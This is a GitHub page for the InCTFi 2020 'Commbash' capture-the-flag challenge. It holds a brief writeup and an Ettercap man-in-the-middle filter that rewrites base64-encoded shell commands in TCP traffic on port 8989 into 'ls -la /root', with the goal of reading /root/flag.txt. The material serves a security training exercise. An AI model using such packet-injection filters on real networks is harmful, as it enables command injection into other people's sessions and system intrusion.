InCTFi/2020/Network Pentest/Commbash at master · teambi0s/InCTFi

History

Name		Name	Last commit message	Last commit date
parent directory ..
actor		actor
director		director
README.md		README.md
docker-compose.yml		docker-compose.yml

README.md

Commbash

Challenge description

Security is a myth, let's prove it again.

Short writeup

Perform an MiTM attack on active hosts using Ettercap or its alternatives
Modify the packets and inject bash commands
cat /root/flag.txt

Exploit Filter

if (ip.proto == TCP && tcp.dst == 8989) {
   if (search(DATA.data, "bHMgL3Zhci9sb2cv")) {
      replace("bHMgL3Zhci9sb2cv", "bHMgLWxhIC9yb290"); 
      msg("Attack Successful!!\n");
   }

   if (search(DATA.data, "dW5hbWU=")) {
      replace("dW5hbWU=", "bHMgLWxhIC9yb290"); 
      msg("Attack Successful!!\n");
   }

   if (search(DATA.data, "d2hvYW1p")) {
      replace("d2hvYW1p", "bHMgLWxhIC9yb290"); 
      msg("Attack Successful!!\n");
   }
   if (search(DATA.data, "aWQ=")) {
      replace("aWQ=", "bHMgLWxhIC9yb290"); 
      msg("Attack Successful!!\n");
   }

}

Author

Jaswanth Bommidi

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Commbash

Commbash

README.md

Commbash

Challenge description

Short writeup

Exploit Filter

Author

Files

Commbash

Directory actions

More options

Directory actions

More options

Latest commit

History

Commbash

Folders and files

parent directory

README.md

Commbash

Challenge description

Short writeup

Exploit Filter

Author